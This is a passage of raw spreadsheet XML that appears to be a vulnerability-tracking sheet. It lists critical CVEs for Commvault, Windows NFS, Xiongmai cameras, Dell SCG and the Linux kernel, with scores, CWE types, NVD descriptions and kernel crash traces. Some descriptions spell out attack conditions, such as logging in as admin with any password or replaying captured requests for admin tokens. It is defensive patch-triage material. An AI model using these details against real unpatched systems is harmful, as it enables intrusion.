          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79395</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>An improper authentication vulnerability in the WS-Security (wsse:UsernameToken) verification routine within the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier allows remote attackers to bypass authentication and execute privileged ONVIF actions (including PTZ control, stream URL retrieval, and system reboot) via a crafted SOAP request supplying the admin username with any arbitrary password when the account's stored password is empty.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79395</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79396</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>Use of hardcoded default credentials in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier stores static account credentials in unencrypted plaintext within bin/config.xml and compiled into the Sofia executable, allowing remote attackers to gain full administrative control over the camera.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79396</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80926</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in oplock break notification
smb2_oplock_break_noti() reads opinfo-&gt;conn without any lock and
dereferences it after two allocations which may sleep.  When the
durable handle owning the oplock is disconnected, session_fd_check()
clears opinfo-&gt;conn and drops its conn reference under ci-&gt;m_lock, and
the last ksmbd_conn_put() frees the connection.  A break triggered by
another connection that races with the teardown can then resurrect the
freed connection: ksmbd_conn_get() is a plain atomic_inc, and the
queued break work later dereferences the stale conn via
ksmbd_conn_write(), a use-after-free reachable by any authenticated
client holding a durable batch oplock.
Thread the caller's inode into the notification path instead of taking
a new reference on it.  Every caller of oplock_break() already holds a
live ksmbd_file (or an explicit ksmbd_inode_lookup_lock() reference,
in the parent lease break paths) on the inode that owns the break
target's oplock list, so ci cannot be freed during the call, and its
lock can be taken without dereferencing opinfo-&gt;o_fp, which a
concurrent close may free.  Select and pin the connection under
ci-&gt;m_lock, the same lock session_fd_check() and
ksmbd_reopen_durable_fd() use to update opinfo-&gt;conn, so a concurrent
detach either loses the race to the clear or keeps the connection
alive until the notification work releases it.  Transfer the reference
to the work item and release it on allocation failures.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80926</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80976</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
seg6: reset IP6CB after IPv6 decapsulation
decap_and_validate() pulls the outer SRv6 headers and makes the inner
packet the skb network header. The IPv6 control block still contains
values collected while parsing the outer packet, including nhoff and
extension-header flags.
End.DX6 and End.DT6 route the inner IPv6 packet directly to the IPv6
input path. An unprivileged user can reach End.DT6 from a user and net
namespace by installing a local SID and injecting an outer packet with
Hop-by-Hop and Destination Options headers followed by an SRH and a
minimal inner IPv6 packet.
The outer extension headers leave a large nhoff in IP6CB. After
decapsulation, ip6_protocol_deliver_rcu() uses that stale offset on the
inner packet and reads beyond the skb head. KASAN reports:
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu
  ip6_protocol_deliver_rcu+0x1118/0x1450
  ip6_input_finish+0x11b/0x240
  seg6_local_input_core+0xed/0x2e0
  lwtunnel_input+0x1e9/0x4e0
  ipv6_rthdr_rcv+0x525f/0x6c50
  ip6_protocol_deliver_rcu+0xcb7/0x1450
Before clearing IP6CB for an inner IPv6 packet, save its incoming
interface index and L3 slave state. Restore both after the clear and set
nhoff to the inner IPv6 base-header nexthdr field.
Use IP6CB(skb)-&gt;iif rather than skb-&gt;skb_iif because VRF processing can
replace skb_iif with the L3 master while IP6CB keeps the receiving
interface. Preserve IP6SKB_L3SLAVE for the same reason.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80976</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80980</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: stop killed, freed and out_of_sync sharing a byte
The three connection state flags are single-bit bitfields, so they occupy
one byte of struct smc_connection and every store to one is a
read-modify-write of the other two:
    u8  killed : 1;
    u8  freed : 1;
    u8  out_of_sync : 1;
They are not written under a common lock. smc_cdc_msg_validate() sets
out_of_sync from the receive tasklet, while smc_conn_kill() sets killed
from process context under lock_sock(), and the receive path does not defer
to the backlog when the socket is owned -- smc_cdc_msg_recv() takes only
bh_lock_sock().
Give each flag its own byte so a store no longer touches its neighbours.
All readers test them as booleans and are unchanged. struct smc_connection
grows by two bytes.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80980</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80981</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix use-after-free of the LLC qentry in smc_llc_srv_add_link()
smc_llc_srv_add_link() keeps add_llc pointing into the queue entry:
  add_llc = &amp;qentry-&gt;msg.add_link;			smc_llc.c:1482
  ...
  smc_llc_save_add_link_info(link_new, add_llc);	smc_llc.c:1494
  smc_llc_flow_qentry_del(&amp;lgr-&gt;llc_flow_lcl);		smc_llc.c:1495
  ...
  u8 *llc_msg = smc_link_shared_v2_rxbuf(link) ?
	(u8 *)lgr-&gt;wr_rx_buf_v2 : (u8 *)add_llc;	smc_llc.c:1504
  smc_llc_save_add_link_rkeys(link, link_new, llc_msg);	smc_llc.c:1506
smc_llc_flow_qentry_del() kfree()s the entry, so on a link without a shared
v2 receive buffer the pointer handed to smc_llc_save_add_link_rkeys() is
already freed. Before the Fixes: commit that branch always used
lgr-&gt;wr_rx_buf_v2 and add_llc was not used after the free.
Reproduced on an unpatched tree over rxe, with KASAN, kasan_multi_shot
and a link forced to max_recv_sge == 1: the entry is freed and read by
the same call, and the freeing frame is smc_llc_srv_add_link() itself.
  [    2.523161] BUG: KASAN: slab-use-after-free in smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523499] Read of size 2 at addr ffff8880052194de by task kworker/0:1/11
  [    2.523789]
  [    2.523862] CPU: 0 UID: 0 PID: 11 Comm: kworker/0:1 Not tainted 7.2.0-rc5-p0-g2c9dd296545d #35 PREEMPT(lazy)
  [    2.523865] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
  [    2.523866] Workqueue: smc_hs_wq smc_listen_work
  [    2.523869] Call Trace:
  [    2.523870]  &lt;TASK&gt;
  [    2.523871]  dump_stack_lvl+0x53/0x70
  [    2.523872]  print_report+0xd0/0x630
  [    2.523874]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
  [    2.523876]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523878]  kasan_report+0xce/0x100
  [    2.523879]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523881]  smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523883]  ? smcr_buf_reg_lgr+0x2a4/0x660
  [    2.523885]  smc_llc_srv_add_link+0xaa2/0x1e50
  [    2.523888]  ? _printk+0xba/0xf0
  [    2.523897]  ? __pfx_smc_llc_srv_add_link+0x10/0x10
  [    2.523899]  ? down_write+0xb0/0x130
  [    2.523903]  ? __pfx_down_write+0x10/0x10
  [    2.523905]  smc_listen_work+0x489e/0x4d00
  [    2.523907]  ? kmem_cache_free+0x1c6/0x3a0
  [    2.523911]  ? __pfx_smc_listen_work+0x10/0x10
  [    2.523913]  ? release_sock+0x148/0x1d0
  [    2.523915]  ? smc_tcp_listen_work+0xb4f/0xfc0
  [    2.523917]  ? _raw_spin_lock_irq+0x80/0xe0
  [    2.523918]  ? __pfx__raw_spin_lock_irq+0x10/0x10
  [    2.523920]  process_one_work+0x633/0x1030
  [    2.523922]  ? assign_work+0x11d/0x370
  [    2.523924]  worker_thread+0x45b/0xd10
  [    2.523926]  ? __pfx_worker_thread+0x10/0x10
  [    2.523928]  ? __pfx_worker_thread+0x10/0x10
  [    2.523929]  kthread+0x2c6/0x3b0
  [    2.523931]  ? recalc_sigpending+0x15c/0x1e0
  [    2.523934]  ? __pfx_kthread+0x10/0x10
  [    2.523935]  ret_from_fork+0x36e/0x5a0
  [    2.523937]  ? __pfx_ret_from_fork+0x10/0x10
  [    2.523938]  ? __switch_to+0x572/0xdd0
  [    2.523943]  ? __pfx_kthread+0x10/0x10
  [    2.523944]  ret_from_fork_asm+0x1a/0x30
  [    2.523947]  &lt;/TASK&gt;
  [    2.523948]
  [    2.531253] Allocated by task 48:
  [    2.531399]  kasan_save_stack+0x33/0x60
  [    2.531570]  kasan_save_track+0x14/0x30
  [    2.531737]  __kasan_kmalloc+0x8f/0xa0
  [    2.531905]  __kmalloc_cache_noprof+0x158/0x370
  [    2.532100]  smc_llc_enqueue+0x72/0x560
  [    2.532268]  smc_wr_rx_tasklet_fn+0x474/0xa80
  [    2.532491]  tasklet_action_common+0x20f/0x8a0
  [    2.532714]  handle_softirqs+0x18e/0x590
  [    2.532886]  do_softirq+0x3b/0x60
  [    2.533036]  __local_bh_enable_ip+0x61/0x70
  [    2.533221]  __alloc_skb+0x732/0x890
  [    2.533384]  rxe_init_packet+0x16b/0x4f0
  [    2.533567]  prepare_ack_packet+0xb8/0x830
  [    2.533760]  rxe_receiver+0x495/0x96e0
  [    2.533933]  do_work+0x144/0x470
  [    2
---truncated---</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80981</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80986</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
